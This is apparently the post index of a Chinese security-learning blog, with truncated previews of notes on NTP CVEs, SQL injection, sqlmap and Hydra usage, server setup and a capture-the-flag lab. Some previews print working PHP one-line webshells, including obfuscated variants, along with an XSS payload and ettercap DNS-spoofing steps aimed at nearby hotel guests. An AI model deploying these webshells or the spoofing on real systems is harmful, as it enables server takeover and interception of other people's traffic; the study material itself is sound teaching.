Daoke37的博客

原创 ntp 4.2.6p5版本漏洞详细

1. NTP CRYPTO_ASSOC 内存泄漏导致拒绝服务漏洞 (CVE-2015-7701) 2. NTPD 栈缓冲区溢出漏洞(CVE-2014-9295) 3. NTPD PRNG无效熵漏洞(CVE-2014-9293) 4. NTPD PRNG弱加密漏洞(CVE-2014-9294) 5. NTP 身份验证绕过漏洞(CVE-2015-7871) 6. NTP Kiss-o'-Death拒绝服务漏洞 (CV...

转载 服务器系统及软件常见漏洞

漏洞名称允许Traceroute探测远端WWW服务支持TRACE请求远端WWW服务提供了对WebDAV的支持远端WEB服务器上存在/robots.txt文件远端VNC服务正在运行远端HTTP服务器类型和版本信息泄漏远端DNS服务允许递归查询远程代理服务器允许连接任意端口远程代理服务器接受POST请求远程VNC HTTP服务正在运行利用SMB会话可以获取远程域或工作组列表利用SMB会话可以获取远程浏览列表利用SMB会话可以获取远程共享列表利用SMB会话可以获取目标主机配置信息利用

原创 牛逼的一句话木码

//可执行命令一句话普通一句话<?php eval($_POST[cc123]) ?><?php @eval($_POST['cc123']);?>PHP系列<?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["xindong"]); ?><?php $lang = (string)key($_POST);$lang($_POST['xindong']);?><?php $k="as

原创 2021-04-13

SQL注入原理：SQL注入是指Web应用程序对用户输入数据的合法性未进行判断、处理，前端传入的参数是攻击者可控的，并且参数被正常的带入到数据库查询，攻击者可以通过构造不同的SQL语句来进行对数据库的操作，正常情况下，攻击者可以对数据库进行高危操作，例如，数据查询、WebShell写入、命令执行等操作。防御：1、严格控制用户的权限2、参数传值3、基础过滤与二次过滤4、使用安全参数5、多层验证6、数据库信息加密...

原创 常见的WebShell管理工具

常见的WebShell管理工具1.中国菜刀2.蚁剑(AntSword)3.C刀(Cknife)4.冰蝎(Behinder)5.Xise6.Altman7.Weevely8.QuasiBot9.Webshell-Sniper10.WebshellManager

原创 渗透测试流程

明确目标当拿到一个合法的渗透测试项目时，我们首先应该明确客户要求我们进行渗透测试的范围以及整体项目的时间。比如说，给我们的域名有哪些，ip段有哪些，哪些社工手段我们不能使用等等信息收集针对域名真实ip查询当然，如果连真实ip都没有找到的话。相当于连门都没有找到，这里最头疼的就是企业常常为了增强网页访问速度为服务加cdn，如何查看是否做了cdn？这里我们可以利用nslookup url这个命令，如果说做了cdn那么会返回多个ip信息（如图1），当然也可以使用不同地点的vps去ping一下域名，做了c

原创 XSS CSRF SSRF

XSS (跨站脚本攻击)不需要你做任何的登录认证，它会通过合法的操作（比如在url中输入、在评论框中输入），向你的页面注入脚本（可能是js、hmtl代码块等）。类型：反射型XSS、存储型XSS、DOM型XSSS；防范：XSS的防范措施主要有三个：编码、过滤、校正设置xss filter 定制过滤策略 输出编码 黑名单白名单 设置http onlyCSRF（跨站请求伪造）CSRF（Cross-site request forgery）：跨域请求伪造，也被称为One Click Attack或

原创 2017 owasptop10

1.SQL注入2.失效的身份认证和会话管理3.敏感信息泄露4.XML外部实体注入(XXE)5.失效的访问控制6.安全配置错误7.XSS跨站脚本8.不安全的反序列化9.使用含有已知漏洞的组件10.不足的日志记录和监控...

原创 代码执行与命令执行

1）代码执行：evalpreg_replace+/eassertcall_user_funccall_user_func_arraycreate_function2)命令执行：system()exec()shell_exec()passthru()pcntl_exec()popen()proc_open()

原创 SQL最重要语句

查询当前数据库版本： select version();查询当前数据库用户： select user();查询当前路径： select @@basedir;查询所有数据库： show databases;选择一个数据库： use + 数据库名;查询当前数据库： select database();查询所有表名： show tables;创建一个数据库： create database 数据库名;删除一个数据库： drop database 数据库名;查询一个表的结构：

原创 Sqlmap注入基础命令

1.//检测当前URL是否是存在SQL注入漏洞sqlmap.py -u “url”2.//检测当前使用的数据库sqlmap.py -u “url” --current-db3.//查看所有的数据库sqlmap.py -u “url” --dbs4.//查询xxx数据库下的所有表sqlmap.py -u url -D 库名 --tables5.查询xxx数据库下xxx表的所有字段sqlmap.py -u “url” -D 库名 -T 表名 --columns6.查询xxx数据库下xxx

原创 linux 前后台任务命令 bg、fg、ctrl+z、ctrl+d和ctrl+c 使用

一、& （常用）& 用在一个命令的最后，使用之后可以把这个命令放到后台执行例： 二、ctrl + z将一个前台执行的命令挂起三、jobs查看当前有多少在后台运行的命令jobs命令执行的结果，＋（加号）表示是一个当前的作业，- （减号）表示是一个当前作业之后的一个作业，jobs -l选项可显示所有任务的PID.jobs的状态可以是running, stopped, Terminated,但是如果任务被终止了（kill），shell 从当前的shell环境已知的列表中删除任务

原创 OpenVas 漏洞扫描器下载使用教程

Openvas简介Openvas是开源的，是Nessus项目分支，用于管理目标系统的漏洞，检测目标网络或主机的安全性。它的评估能力来源于数万个漏洞测试程序，openvas 早起版本还有一个客户端，现在的版本已经不提供客户端程序，现基于B/S(浏览器/服务器)架构进行工作，执行扫描并提供扫描结果。安装下载在Kali早起版本默认安装openvas，随着kali版本的更新，现openvas已不默认安装在kali里需手动安装，安装步骤如下：1、apt-get update：更新软件包列表2、apt-get

原创 Nessus下载

地址：https://www.tenable.com/downloads/nessus?loginAttempted=true

原创 2020-12-17

首先先打开ettercap的DNS文件进行编辑，在kali linux2.0下的文件路径为/etc/ettercap/etter.dns在对应的位置添加对应的 标识和IP地址 * 代表所有域名 后边就是你要欺骗为的IP地址，这里是当然是我自己的主机IP地址啦，然后记得保存。再来编辑/var/www/html/index.html文件 改成你定义页面 这里我简单的改了下因为后边我们要启动apache2 也就是网页服务器 这是主页文件，说白了目的是为了DNS欺骗成功后，当受害者（隔壁宾馆两口）访

原创 xss测试语句大全

‘>%3Cscript%3Ealert(1)%3C/script%3E

原创 各大搜索引擎爬虫 User-Agent

百度搜索User-Agent：百度 PC UAMozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)百度移动 UAMozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) Apple

原创 常用的一些子域名，旁站查询

子域名，旁站一https://tools.ipip.net/ipdomain.php?ip=x.x.x.xhttps://cn.bing.com/search?q=ip:x.x.x.x Bing搜索https://api.hackertarget.com/reverseiplookup/?q=xxx.comhttps://securitytrails.com/dns-trails 比较常用的一个https://www.robtex.com/cidr/x.x.x.x-xhttps://fofa

原创 Linux 防火墙配置

原创 Linux基础命令使用（基于ContOS7）

Liunx 目录管理1.终端实用技巧1.1 tab 键自动补全1.2 按 上／下 光标键曾经使用过的命令来回切换1.3 ctrl + c 结束命令2.ls(list) 列出目录-a 显示指定目录下所有子目录与文件，包括隐藏文件-l 以列表方式显示文件的详细信息-h 配合 -l 以人性化的方式显示文件大小-d 仅列出目录本身，而不是列出目录内的文件数据3. cd (change directory)切换目录cd… 切换到上级目录cd - 可以在最近两次工作目

原创 VMware创建ContOS7虚拟机及换国内源

创建虚拟机1.打开虚拟机主页，点击新建虚拟机按钮2.新建虚拟机向导，这里我使用典型方式进行演示3.安装客户机操作系统这里选择稍后安装系统，下一步如果这里直接加载了CentOS镜像光盘，之后会自动进行系统的安装操作。4.选择客户机操作系统选择Linux，版本选择CentOS7 64位，下一步如果是低版本的VMware，版本里面可能只有CentOS，和CentOS 64位 那么就选择CentOS64位5.命名虚拟机选择安装位置虚拟机名称：根据自己的爱好或需求来命名都可以，这里我就保持

原创 vi/vim

chmod -R 777 文件名/文件夹名 （更改文件权限）mkdir （创建文件夹命令）touch （文件夹下创建文件命令）user：用户group：组others：其他owner：主rm 删除文件命令 加 -rf 为强制删除vim命令： i 进入输入模式 x删除光标所在内容...

原创 rwx

rwx：read(读取) wrute （写入） execute（执行）file type：文件类型user permissions：用户权限group permissions：属组权限other（everyone）permissions：其他（所有人）权限number of hard links：硬链接数user name：用户名group name：组名size：大小filename:文件名...

原创 DHCP搭建

添加DHCP服务管理器中角色添加DHCP服务器父域名随意，DNS我这里填入的是8.8.8.8 备用DNS为8.8.4.4 并且验证也是有效禁用v6这里就DHCP安装完成了，接着在本地网络中设为动态网络进入DHCP分配的动态IP在物理机中禁用后再启用本地网络进入搭建的DHCP动态IP这里我们看见有一台主机已经进入了，就ok了...

原创 FTP搭建

第一步：服务管理器添加角色在服务器管理中添加 web服务器（IIS）接着在IIS中添加FTP服务器第二步：IIS管理器中添加FTP站点这个FTP站点名称可以随便一点 物理路径是我事先创建好的一个文件夹这里的IP地址为自己虚拟机的地址选择无SSL第三步：创建用户和组首先创建用户 如图：创建完成用户之后我们继续再创建一个组添加刚刚创建的用户到该组内这时我们创建的用户已经成功进组，接下来我们就该检测成功没有，而有的虚拟机还需关闭防火墙才可以访问进去哦！！！第四步：在物理机和浏览器

原创 Hydra（暴力破解工具）参数

参数详解：-R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-M 文件-t 指定多线程数量，默认为16个线程-x 最小值：MAX：CHARSET +，|-C 文件 [，ID：密码]f =w +（等待

原创 DNS搭建

第一步：修改本地连接 Internet协议版本4IP地址修改为本机ip 如图：第二步：进入DNS管理器下的正向查找区域中新建区域 如图所示：在新建的区域内新建主机 如图：第三步：在物理机中修改Internet 协议4 DNS服务器IP改为虚拟机中的ip 如图：到这里就可以去网站搜索域名查找了：...

原创 域下添加用户

第一步：点击开始进入管理工具中的Active Directory用户和计算机 如图所示：第二步：点开已经创建的lala.com域下Users文件中新建用户 如图所示：第三步：创建完成之后尝试登陆

原创 2020-11-13

个人笔记www.baidu.com 39.156.69.79linux 一切设备皆文件file 查看文件类型服务器：对外提供服务的计算机称为服务器网站组成：–1：操作系统：Windows/LinuxWindows系列个人版本： Windows xp/7/8/10服务器版本：Windows server 2003/ 2003R2 /2008/2008 R2/2012/2016/2019Linux系列个人版本：Ubuntu/Debain/kali linux/backtrack

原创 计算机网络概念

计算机网络概念：将分布在不同地理位置，且具有独立功能的计算机,通过通信设备以及通信介质，在网络操作系统，网络管理软件及网络通信协议的管理和协调下形成的计算机系统，从而实现信息传输与资源共享。通信设备：AC控制器/集线器/交换机/路由器/防火墙/AP无线设备网络管理软件:Xshell/SourceCRT/Putty计算机网络分类：1:按照地理范围覆盖（1）局域网 100-1000 LAN（2）城域网 一个城市 MAN（3）广域网 互联网

原创 渗透测试工程

学习目标：渗透测试工程学习内容：1 了解什么内网与外网2、了解什么是IP地址3、了解OSI七层模型与TCP/IP五层模型4、 了解TCP与UDP的区别Internet与IP地址：Internet概述：因特网（Internet）是一组全球信息资源的总汇。有一种粗略的说法，认为INTERNET是由于许多小的网络（子网）互联而成的一个逻辑网，每个子网中连接着若干台计算机（主机）。Internet以相互交流信息资源为目的，基于一些共同的协议，并通过许多路由器和公共互联网而成，它是一个信息资

原创 2020-11-12

Tor运行原理1.请求方需要使用：洋葱浏览器（Tor Browser）来对暗网网站进行访问2.响应放需要使用：Tor协议的的Hidden_service搭建步骤更新YUM源：rpm -Uvh https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm安装nginx：yum -y install nginx安装tor协议：yum -y install tor停止并禁用防火墙：1.systemctl s

原创 OS-HackerNos-1

实验主机：Os-hackerNos靶机一台/Kali linux实验网络：桥接网络实验目标：获取靶机的Root权限难易程度：简单攻击机一台前期工作：1：下载Virtualbox虚拟化软件，地址如下：https://www.virtualbox.org/wiki/Downloads12：下载目标靶机并导入Virtualbox，地址如下：https://www.vulnhub.com/entry/hacknos-os-hacknos,401/1将Os-hackNos-1.ova下载下来之后